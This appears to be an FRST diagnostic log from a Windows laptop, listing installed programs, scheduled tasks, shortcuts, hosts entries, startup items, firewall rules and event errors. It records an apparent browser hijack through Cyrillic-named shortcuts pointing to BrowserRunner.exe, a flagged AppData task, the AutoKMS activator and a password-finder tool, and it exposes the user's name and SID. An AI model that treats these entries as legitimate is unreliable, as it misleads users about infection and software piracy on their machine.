Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.306 - Qualcomm Atheros)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7179 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.7 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.7 - VS Revo Group, Ltd.)
Setup (x32 Version: 19.5.0.35 - Corel Corporation) Hidden
Share64 (Version: 19.5.0.35 - Corel Corporation) Hidden
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 3.5.0.1144 - Lenovo)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.1 - Synaptics Incorporated)
TextPad 8 (HKLM-x32\...\{861AB1C1-1967-4C4A-BF86-C255E2D2B8FD}) (Version: 8.0.2 - Helios)
TNod User & Password Finder (HKLM\...\TNod) (Version: 1.6.0.0 - Tukero[X]Team)
Toolkit Documentation (x32 Version: 8.100.26866 - Microsoft) Hidden
TOSHIBA Desktop Assist (HKLM\...\{C4CDCEF0-0A7A-4425-887C-33E39533D758}) (Version: 1.03.01.6402 - Toshiba Corporation)
TOSHIBA Display Utility (HKLM\...\{5F6AC07E-50EF-422E-B56E-6521E5B35139}) (Version: 1.1.12.0 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{94D2A899-0C34-4420-880E-AE337E635AB0}) (Version: 2.4.1.6404 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.1.0003.6401 - Toshiba Corporation)
TOSHIBA HDD Accelerator (HKLM\...\{DB4D9937-0B14-4EF1-BF9A-BB7E3B9DCB04}) (Version: 2.2.0000 - Toshiba Corporation)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{78931270-BC9E-441A-A52B-73ECD4ACFAB5}) (Version: 3.00.349 - Toshiba Corporation)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.10.1.6400 - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 3.1.02.55065006 - Toshiba Corporation)
TOSHIBA Service Station (HKLM\...\{BFE4C813-4DD4-4B1C-97F4-76A459055C8D}) (Version: 2.6.13 - Toshiba Corporation)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0032 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{4D57ED72-6B01-40BD-9CA9-012B8FC09CEB}) (Version: 2.0.0.32003 - Toshiba Corporation)
Toy Defense version 1.0.0 (HKLM-x32\...\{B7BB6DD8-E6AC-4E9E-B65F-4DF173FBE43C}_is1) (Version: 1.0.0 - 123FullSetup)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Update for Skype for Business 2015 (KB2889853) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{40930C8E-A677-414C-A72F-DFDEB10738FB}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Viber (HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\{d924dc86-33fe-49b3-9439-8b0e69ec7216}) (Version: 6.4.2.15 - Viber Media Inc.)
Viber (x32 Version: 6.4.2.15 - Viber Media Inc.) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VSClassic64 (Version: 19.5.0.35 - Corel Corporation) Hidden
VSUltimate64 (Version: 19.5.0.35 - Corel Corporation) Hidden
WampServer 2.5 (HKLM-x32\...\WampServer 2_is1) (Version: - Hervé Leclerc (HeL))
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (Toshiba Games) (x32 Version: 4.0.10.20 - WildTangent) Hidden
Windows Assessment and Deployment Kit for Windows 8.1 (HKLM-x32\...\{e9e06304-a604-434b-b35f-d9beb94dc06d}) (Version: 8.100.26866 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WPT Redistributables (x32 Version: 8.100.26866 - Microsoft) Hidden
WPTx64 (x32 Version: 8.100.26837 - Microsoft) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1061507693-3713582409-3664479191-1001_Classes\CLSID\{5A9E21A2-851A-4BEB-B16F-DBBE7D648AF9}\InprocServer32 -> C:\Program Files (x86)\TextPad 8\System\ShellExt64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {105F2CB6-0815-49F7-9BCC-2B91FDC5614F} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-11-02] (AVG Technologies CZ, s.r.o.)
Task: {292D4DE8-465A-4E7B-893D-95E8FFB0D79A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)
Task: {45C1D4AE-FE87-40CC-AA69-CE1349216A41} - System32\Tasks\EPSON L220 Series Update {441D2E96-17AE-4DAF-957A-A09CD9765B46} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN2E.EXE [2013-11-22] (SEIKO EPSON CORPORATION)
Task: {62FDCF2B-0A69-4494-B6AA-25101D9D0846} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-01-21] (Realtek Semiconductor)
Task: {7340869A-6955-487C-9F8A-DB689B70598A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {9584C8CB-ACAE-4641-9A2D-E137581DFD3C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)
Task: {9B728E78-D034-4D9D-A3EA-815DCC511F30} - System32\Tasks\12D0C7EA-D811-4065-9AB-B93C9D95E73E => C:\Users\Ptr. Julius Lampao\AppData\Local\12D0C7EA-D811-4065-9AB-B93C9D95E73E\12D0C7EA-D811-4065-9AB-B93C9D95E73E.exe <==== ATTENTION
Task: {A14D99D7-6186-4C18-844F-C21BF95F0A98} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {A15E0744-D54F-480A-955C-2CC6643222FE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A5787A85-A678-4B47-9782-744A6FA46D0E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {AE29672D-3323-471A-860A-EA9BA83D62D1} - System32\Tasks\GoogleUpdateTaskMachineUA1d0e4aa547d74bb => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)
Task: {CE243A68-0B92-4813-A7FA-0DF02C11DAB7} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {D6C59573-0C23-4F62-9ECB-A48DFF8BE0E1} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {D85797CF-5585-4310-8889-11F0A394C931} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2013-09-25] (TOSHIBA Corporation)
Task: {E6338573-01FE-4C38-888B-B489B809802A} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-08-22] (Synaptics Incorporated)
Task: {EA24C9C4-7A4D-4A3D-B5D3-622A7E887D8F} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2016-01-30] (Oracle Corporation)
Task: {F42FD3BA-6E79-4793-BCAB-C6957B982186} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2014-12-12] ()
Task: {F6CF9305-7244-4493-AB34-C35743C65BCE} - System32\Tasks\GoogleUpdateTaskMachineCore1d0f2858b2fd7ad => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\EPSON L220 Series Update {441D2E96-17AE-4DAF-957A-A09CD9765B46}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN2E.EXE:/EXE:{441D2E96-17AE-4DAF-957A-A09CD9765B46} /F:Update WORKGROUP\PASTOR$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Ptr. Julius Lampao\Desktop\FacebookShortCut.lnk -> C:\Users\Ptr. Julius Lampao\Documents\FB2.bat ()

ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files\Internet Explorer\iexplore.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\КРrохy Васkgrоund Арр.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files\Internet Explorer\iexplore.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" <===== Cyrillic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Public\Desktop\VidеоStudiо Х9 Тrаining.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Internet Explorer\iexplore.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Public\Desktop\Моzillа Firеfох.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" <===== Cyrillic

==================== Loaded Modules (Whitelisted) ==============

2014-12-11 10:03 - 2015-11-10 07:25 - 00218624 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
2016-05-21 00:46 - 2016-05-21 00:46 - 00331944 _____ () C:\Program Files (x86)\HPDef\HomePageDefSrv.exe
2010-11-16 21:38 - 2010-11-16 21:38 - 00339456 _____ () C:\ProgramData\DatacardService\HWDeviceService64.exe
2015-07-14 12:59 - 2015-07-14 12:59 - 08898720 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2010-07-15 12:44 - 2010-07-15 12:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2016-02-28 19:54 - 2016-02-28 19:54 - 00117384 _____ () C:\Program Files (x86)\TextPad 8\System\ShellExt64.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 00011362 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\mingwm10.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 00043008 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\libgcc_s_dw2-1.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 02415104 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtCore4.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 01148416 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtNetwork4.dll
2016-03-01 13:48 - 2016-04-14 22:48 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2016-11-15 18:03 - 2016-11-09 04:29 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libglesv2.dll
2016-11-15 18:03 - 2016-11-09 04:29 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-09-22 11:01 - 2016-12-02 02:01 - 01440083 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost
255.255.255.255 broadcasthost0.0.0.0 ad.beepworld.de
0.0.0.0 ad.beritasatumedia.com
0.0.0.0 ad.bg.doubleclick.net
0.0.0.0 ad.blackystars.com
0.0.0.0 ad.eurosport.com #[oas.eurosport.com]
0.0.0.0 ad.fi.doubleclick.net
0.0.0.0 ad.flux.com
0.0.0.0 ad.foxnetworks.com
0.0.0.0 ad.fr.doubleclick.net
0.0.0.0 ad.freecity.de
0.0.0.0 ad.gazeta.pl
0.0.0.0 ad.gen.tbn.ru
0.0.0.0 ad.glossymedia.pl
0.0.0.0 ad.go.com
0.0.0.0 ad.gr.doubleclick.net
0.0.0.0 ad.hankooki.com
0.0.0.0 ad.hbinc.com
0.0.0.0 ad.hbv.de
0.0.0.0 ad.hi5.com
0.0.0.0 ad.himediadx.com
0.0.0.0 ad.hirekmedia.hu
0.0.0.0 ad.hit.gemius.pl
0.0.0.0 ad.hizlireklam.com
0.0.0.0 ad.hk.doubleclick.net
0.0.0.0 ad.hosting.pl
0.0.0.0 ad.hr.doubleclick.net
0.0.0.0 ad.httpool.com
0.0.0.0 ad.hu.doubleclick.net
0.0.0.0 ad.ie.doubleclick.net

There are 42983 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Theme1\img1.jpg
DNS Servers: 192.168.6.29
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: GamesAppIntegrationService => 2
MSCONFIG\Services: GamesAppService => 3
MSCONFIG\Services: GFNEXSrv => 2
MSCONFIG\Services: Globe Tattoo Broadband. RunOuc => 2
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: IJPLMSVC => 2
MSCONFIG\Services: SSFK => 2
MSCONFIG\Services: wuauserv => 3
HKLM\...\StartupApproved\StartupFolder: => "Ginger.lnk"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKLM\...\StartupApproved\Run: => "Persistence"
HKLM\...\StartupApproved\Run: => "TecoResident"
HKLM\...\StartupApproved\Run: => "TNOD UP"
HKLM\...\StartupApproved\Run: => "TCrdMain"
HKLM\...\StartupApproved\Run: => "TSSSrv"
HKLM\...\StartupApproved\Run: => "TosWaitSrv"
HKLM\...\StartupApproved\Run: => "CanonMyPrinter"
HKLM\...\StartupApproved\Run: => "CanonSolutionMenu"
HKLM\...\StartupApproved\Run: => "Corel Update Helper"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "1.TPUReg"
HKLM\...\StartupApproved\Run32: => "AmIcoSinglun64"
HKLM\...\StartupApproved\Run32: => "TSVU"
HKLM\...\StartupApproved\Run32: => "EaseUS EPM tray"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\StartupFolder: => "Canon IJ Status Monitor Canon iP2700 series.lnk"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "E09AXLRD_952483187"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "SRecorder"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{67E3733D-DE28-47E5-BA53-26DE28AC33FD}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{2F934015-5385-4D86-BC48-E816AE445D1A}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{A4F18ACC-FDEA-4860-B9E8-519CCB8FC7AC}] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{5D0CF972-F8CA-42EF-A095-DCD7FF1A15A6}] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{A562EE2E-292B-4822-93B9-962FD1AFDC1F}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6D0F410D-1796-4D1E-B3E5-D0D416A4CB23}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DDB885CA-29F1-4C7E-B93E-7C3C50DCB35B}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [UDP Query User{FEB98499-1BA0-49D7-9AC2-3CAAC30F2886}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [{ADDECCAC-9593-4FE8-A7E9-8102B9490937}] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [{BC38D600-DEB4-4079-82EC-A15ACF2092E9}] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [TCP Query User{5372F0A7-7F52-476E-9C64-3BB8F7ABC25D}C:\program files (x86)\skype\phone\skype.exe] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{FBBD21E9-4F24-4775-80DB-6890D706D6A0}C:\program files (x86)\skype\phone\skype.exe] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{9746468A-AF5E-470A-AEF1-FF22AFD2708E}] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{1F310886-6B1A-44AE-A21B-62E901701301}] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{6C4E177D-29DB-4DE0-8DF9-6B5DA8DC6A2D}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe
FirewallRules: [{E2C9E5F3-1042-4D7A-B984-C4271C999D19}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{AFF01217-DB7C-4199-AB7A-F56988871786}C:\program files\netbeans 8.0.2\bin\netbeans64.exe] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [UDP Query User{22353523-7F6F-4D5D-A6F7-2C08E4BBC8B8}C:\program files\netbeans 8.0.2\bin\netbeans64.exe] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [{538664B1-4865-4ABC-B2BA-720475CF68DD}] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [{F0FCE1DB-A715-466E-B435-69A2554078B3}] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [TCP Query User{40D1F087-A302-4D8D-9068-FCA31E4B8132}D:\uᔄ.exe] => D:\uᔄ.exe
FirewallRules: [UDP Query User{98070BF6-D35F-42C5-B3D5-0F67A5ADC81B}D:\uᔄ.exe] => D:\uᔄ.exe
FirewallRules: [{A1663732-FB28-40DE-88D2-3663373621C3}] => C:\Program Files (x86)\SHAREit\SHAREit\SHAREit.exe
FirewallRules: [{59BEAAD2-0F40-4584-A18F-CBC1E7C9D17A}] => C:\Program Files (x86)\SHAREit\SHAREit\SHAREit.exe
FirewallRules: [{012B3146-E2A6-4464-B7A4-8BAA8F730480}] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{FD2565C2-5ECC-4CA5-87CA-6685710D1314}] => C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{6A8E1ED0-5305-4F96-A45A-F25F73229ADC}] => LPort=2869
FirewallRules: [{BCD7CC67-2862-4281-85DD-942A47A5C3BA}] => LPort=1900
FirewallRules: [{F575462E-FBBF-4D2A-85C4-E835BCD4B8E7}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-11-2016 16:51:06 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
28-11-2016 09:36:58 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/30/2016 02:51:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Viber.exe, version: 6.4.2.15, time stamp: 0x582f162d
Faulting module name: Qt5Core.dll, version: 5.6.1.0, time stamp: 0x58073e23
Exception code: 0xc0000005
Fault offset: 0x0002b171
Faulting process id: 0x488
Faulting application start time: 0x01d24a7161f4b604
Faulting application path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Viber.exe
Faulting module path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Qt5Core.dll
Report Id: e35b89b0-b664-11e6-85ee-202564357a82
Faulting package full name:
Faulting package-relative application ID:

Error: (11/28/2016 06:29:45 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 54.0.2840.99 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 143c

Start Time: 01d2495f02901167

Termination Time: 29844

Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Report Id: 7c17c807-b555-11e6-85ee-202564357a82

Faulting package full name:

Faulting package-relative application ID:

Error: (11/28/2016 09:19:11 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "c:\program files (x86)\EaseUS\easeus partition master 9.2.2\DRW\RdfCheck.exe".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/28/2016 09:13:46 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "c:\program files (x86)\EaseUS\easeus partition master 9.2.2\DRW\RdfCheck.exe".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/27/2016 10:15:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 54.0.2840.99 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1028

Start Time: 01d248b3f4d2a89d

Termination Time: 40

Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Report Id: ede0b1cc-b4ab-11e6-85ee-202564357a82

Faulting package full name:

Faulting package-relative application ID:

Error: (11/27/2016 11:57:59 AM) (Source: Desktop Window Manager) (EventID: 9020) (User: )
Description: The Desktop Window Manager has encountered a fatal error (0x8898008d)

Error: (11/26/2016 10:40:46 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Viber.exe, version: 6.4.2.15, time stamp: 0x582f162d
Faulting module name: Qt5Core.dll, version: 5.6.1.0, time stamp: 0x58073e23
Exception code: 0xc0000005
Fault offset: 0x0002b169
Faulting process id: 0x3b8
Faulting application start time: 0x01d2478e67b74602
Faulting application path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Viber.exe
Faulting module path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Qt5Core.dll
Report Id: baf87288-b381-11e6-85ed-202564357a82
Faulting package full name:
Faulting package-relative application ID:

Error: (11/20/2016 03:37:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: wmprph.exe, version: 12.0.9600.16384, time stamp: 0x5215ef9d
Faulting module name: ntdll.dll, version: 6.3.9600.18007, time stamp: 0x55c4c16b
Exception code: 0xc0000005
Fault offset: 0x000000000003d86e
Faulting process id: 0x904
Faulting application start time: 0x01d24300fb256820
Faulting application path: C:\Program Files\Windows Media Player\wmprph.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 39a9cc28-aef4-11e6-85ed-202564357a82
Faulting package full name:
Faulting package-relative application ID:

Error: (11/08/2016 09:16:01 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\Corel\Corel VideoStudio X9\x86\ssBridge32.exe".
Dependent Assembly Microsoft.VC80.ATL,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/08/2016 08:54:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\Corel\Corel VideoStudio X9\MultiCamService.exe".
Dependent Assembly Microsoft.VC90.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.8" could not be found.
Please use sxstrace.exe for detailed diagnosis.


System errors:
=============
Error: (11/30/2016 06:56:46 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.

Error: (11/30/2016 06:56:45 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.

Error: (11/30/2016 06:55:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Globe Tattoo Broadband. OUC service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (11/30/2016 06:55:37 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Globe Tattoo Broadband. OUC service to connect.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
